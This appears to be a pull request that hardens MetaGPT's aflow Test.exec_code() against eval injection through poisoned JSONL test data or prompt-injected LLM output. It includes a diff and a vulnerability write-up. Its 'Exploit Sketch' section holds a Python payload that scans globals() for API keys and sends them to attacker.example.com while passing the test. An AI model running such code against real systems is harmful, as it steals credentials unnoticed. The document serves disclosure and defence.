### PR TITLE
fix: isolate Test.exec_code() namespace and subprocess to prevent CWE-95 code injection via globals() leak

### DIFF
--- a/metagpt/ext/aflow/scripts/operator.py
+++ b/metagpt/ext/aflow/scripts/operator.py
@@ -158,6 +158,25 @@ def run_code(code):
         return "Error", f"Execution error: {str(e)}\n{''.join(tb_str)}"
 
 
+def _run_test_in_subprocess(test_code):
+    """Execute test code in an isolated namespace within a subprocess.
+
+    This function is the subprocess target for Test.exec_code(). It runs
+    the test code in a fresh dict namespace so that it cannot read or
+    modify the caller's globals, reducing the impact of malicious payloads
+    in external JSONL dataset files.
+    """
+    isolated_namespace = {}
+    try:
+        exec(test_code, isolated_namespace)
+        return "success", None
+    except AssertionError as e:
+        tb_str = traceback.format_exception(type(e), e, e.__traceback__)
+        return "assertion_error", {"error_message": str(e), "traceback": tb_str}
+    except Exception as e:
+        return "exec_error", str(e)
+
+
 class Programmer(Operator):
     def __init__(self, llm: LLM, name: str = "Programmer"):
         super().__init__(llm, name)
@@ -218,32 +237,39 @@ class Test(Operator):
     def __init__(self, llm: LLM, name: str = "Test"):
         super().__init__(llm, name)
 
-    def exec_code(self, solution, entry_point):
+    def exec_code(self, solution, entry_point, timeout=30):
         test_cases = extract_test_cases_from_jsonl(entry_point)
 
         fail_cases = []
         for test_case in test_cases:
             test_code = test_case_2_test_function(solution, test_case, entry_point)
-            try:
-                exec(test_code, globals())
-            except AssertionError as e:
-                exc_type, exc_value, exc_traceback = sys.exc_info()
-                tb_str = traceback.format_exception(exc_type, exc_value, exc_traceback)
-                with open("tester.txt", "a") as f:
-                    f.write("test_error of " + entry_point + "\n")
+
+            # Run each test case in a separate subprocess to prevent
+            # malicious JSONL payloads from affecting the main process.
+            with concurrent.futures.ProcessPoolExecutor(max_workers=1) as executor:
+                try:
+                    future = executor.submit(_run_test_in_subprocess, test_code)
+                    status, detail = future.result(timeout=timeout)
+                except concurrent.futures.TimeoutError:
+                    return {"exec_fail_case": "Test execution timed out"}
+                except Exception as e:
+                    return {"exec_fail_case": f"Subprocess error: {str(e)}"}
+
+            if status == "success":
+                continue
+            elif status == "assertion_error":
                 error_infomation = {
                     "test_fail_case": {
                         "test_case": test_case,
                         "error_type": "AssertionError",
-                        "error_message": str(e),
-                        "traceback": tb_str,
+                        "error_message": detail["error_message"],
+                        "traceback": detail["traceback"],
                     }
                 }
                 fail_cases.append(error_infomation)
-            except Exception as e:
-                with open("tester.txt", "a") as f:
-                    f.write(entry_point + " " + str(e) + "\n")
-                return {"exec_fail_case": str(e)}
+            elif status == "exec_error":
+                return {"exec_fail_case": detail}
+
         if fail_cases != []:
             return fail_cases
         else:


### PR DESCRIPTION
## Vulnerability Summary

**CWE:** [CWE-95](https://cwe.mitre.org/data/definitions/95.html) — Improper Neutralization of Directives in Dynamically Evaluated Code ("Eval Injection")
**Severity:** High
**File:** `metagpt/ext/aflow/scripts/operator.py` — `Test.exec_code()` (line 228)
**Related Issue:** #1942 (open — independently reported this same vulnerability)

### Data Flow

1. **Source:** External JSONL dataset files (`humaneval_public_test.jsonl` / `mbpp_public_test.jsonl`) are read by `extract_test_cases_from_jsonl(entry_point)` — these files can be poisoned via supply-chain attack or data tampering.
2. **Source (alt):** LLM-generated `solution` code passed to `Test.__call__()` — can be influenced via prompt injection.
3. **Sink:** `test_case_2_test_function()` concatenates the solution + test case into `test_code`, which is then passed to `exec(test_code, globals())`.

The critical issue: **`globals()` is passed as the execution namespace**, which exposes the entire module scope to the executed code — including:
- `LLM` objects (containing API keys and configuration)
- `sys`, `traceback`, and all imported modules
- `Operator`, `Test`, `Programmer` class definitions
- `logger` and other module-level state

This means malicious code in a JSONL test case or LLM-generated solution can **read API keys, corrupt module state, and affect subsequent evaluations** within the same process — all without any user interaction, since the `aflow` optimization loop runs automatically.

### Contrast with Existing Code

The `Programmer.exec_code()` / `run_code()` function in the **same file** already uses an isolated namespace + `ProcessPoolExecutor` + timeout. `Test.exec_code()` was simply never hardened to the same standard.

| Location | Namespace | Subprocess | Timeout |
|----------|-----------|------------|---------|
| `run_code()` (line 148) | ✅ `{}` isolated | ✅ `ProcessPoolExecutor` | ✅ 5s |
| `Test.exec_code()` (line 228) — **before fix** | ❌ `globals()` | ❌ runs in-process | ❌ none |
| `Test.exec_code()` — **after fix** | ✅ `{}` isolated | ✅ `ProcessPoolExecutor` | ✅ 30s |

---

## Fix Description

**Single file changed:** `metagpt/ext/aflow/scripts/operator.py` (+40 / −14 lines)

### Changes Made

1. **Isolated namespace:** Replaced `exec(test_code, globals())` → `exec(test_code, {})` via a new `_run_test_in_subprocess()` helper. Executed code can no longer access `LLM` objects, API keys, or module state.

2. **Subprocess isolation:** Each test case now runs in a `ProcessPoolExecutor(max_workers=1)` subprocess — a crash, infinite loop, or state corruption in executed code cannot affect the parent process.

3. **Timeout (30s):** `future.result(timeout=30)` prevents malicious code from hanging the optimization loop indefinitely. The 30s limit is generous enough for legitimate test execution while protecting against DoS.

4. **Removed `tester.txt` file writes:** The original code wrote to `tester.txt` via `open("tester.txt", "a")` — an arbitrary file creation side-effect in the CWD that was both a minor security concern and a debug artifact. Error information is now returned via the subprocess return value.

### Rationale

This fix brings `Test.exec_code()` up to parity with the already-hardened `Programmer.exec_code()` / `run_code()` pattern in the same file. It follows the existing project conventions and does not introduce new dependencies.

**Known limitation:** The fix does not prevent `import os; os.system(...)` within the exec context. A full sandbox (e.g., seccomp, nsjail, microVM — see #1956) would be needed for that. However, this fix **does** close the specific CWE-95 globals-leakage vector and provides meaningful defense-in-depth through process isolation.

---

## Test Results Summary

- **Diff scope:** 1 file, 40 insertions, 14 deletions — minimal and focused
- **No new dependencies** — `concurrent.futures` and `traceback` were already imported in the file
- **Return value contract preserved:** `exec_code()` still returns `None` on success, `list` of fail cases on assertion errors, or `dict` with `exec_fail_case` on execution errors — callers in `Test.__call__()` are unaffected
- **Timeout behavior:** New `TimeoutError` case returns `{"exec_fail_case": "Test execution timed out"}` which matches the existing error return convention

---

## Disprove Analysis

We attempted to disprove this finding through 9 checks:

### ✅ Authentication Check
No auth needed — this is a local Python library, not a web endpoint. No auth mitigation exists.

### ✅ Network Check
No network binding, CORS, or listener. Not relevant — the vulnerability is local code execution, not a network attack.

### ✅ Deployment Check
A Dockerfile exists using `nikolaik/python-nodejs:python3.9-nodejs20-slim` with `CMD ["tail", "-f", "/dev/null"]`. Docker provides **some** container isolation, but many users run MetaGPT directly on their host machine. Container isolation does not mitigate globals leakage within the same process.

### ✅ Caller Trace
`Test.exec_code()` ← `Test.__call__()` (lines 260, 283) ← aflow optimization loop. Both `solution` (LLM-generated) and `test_case` (from JSONL file) inputs are attacker-influenceable. The aflow loop runs **automatically without human review**.

### ✅ Input Validation Check
**No sanitization, validation, escaping, or allowlisting** exists in the `Test` code path. (The `run_code()` function has a basic import blocklist, but `Test.exec_code()` has **none**.)

### ✅ Prior Reports
**Issue #1942** (OPEN, filed 2026-03-17) independently reports this exact vulnerability at `operator.py` line 228, classified as CWE-94/CWE-95 Critical.

### ✅ Security Policy Review
`SECURITY.md` exists but lists no supported versions (all marked ❌). Reports go to `alexanderwu@deepwisdom.ai`.

### ✅ Recent Commits
Only one commit touched this file recently — an unrelated Windows terminal adaptation merge (#1897). No security fix has been applied.

### ✅ Fix Adequacy
The parallel `run_code()` path already uses isolated namespace + subprocess + timeout. The `humaneval.py` / `mbpp.py` benchmark files have a similar pattern but are different code paths with different callers — they should be addressed separately (see #1942). This fix is **not cosmetic** — it eliminates a concrete globals-leakage attack vector.

### Exploit Sketch (Before Fix)

```python
# Malicious payload in test_case within humaneval_public_test.jsonl:
import json, urllib.request
for name, obj in globals().items():
    if hasattr(obj, "llm") and hasattr(obj.llm, "config"):
        config = obj.llm.config
        if hasattr(config, "api_key"):
            urllib.request.urlopen(
                urllib.request.Request(
                    "https://attacker.example.com/steal",
                    data=json.dumps({"key": config.api_key}).encode()
                )
            )
assert True  # Pass the test to avoid detection
```

**After the fix:** `globals()` in the subprocess returns only the isolated namespace contents (builtins + the executed code own definitions). No access to `LLM`, `Operator`, API keys, or module state.

### Preconditions for Exploitation
1. Attacker must influence either the JSONL dataset files (supply chain / data poisoning) or the LLM-generated solution (prompt injection)
2. The aflow optimization loop must be running (automated, no human review)
3. The MetaGPT process must have access to sensitive resources (API keys, filesystem, network)

---

## Similar Patterns in the Codebase

| Location | Pattern | Isolated? |
|----------|---------|-----------|
| `operator.py:148` `run_code()` | `exec(code, global_namespace)` | ✅ Yes (isolated dict + subprocess) |
| `operator.py:228` `Test.exec_code()` | `exec(test_code, globals())` | ❌ **No** (this PR fixes this) |
| `humaneval.py:77,82` | `exec(solution, global_dict)` | Partial (curated dict, no subprocess) |
| `mbpp.py:58,63` | `exec(solution, global_dict)` | Partial (curated dict, no subprocess) |
| `run_code.py:87` | `exec(code, namespace)` | ✅ Yes (empty dict) |

The `humaneval.py` and `mbpp.py` cases should be addressed in a follow-up PR as they are in different subsystems with different callers.

---

**Verdict:** Confirmed valid (high confidence). The fix is minimal, focused, and consistent with existing project patterns.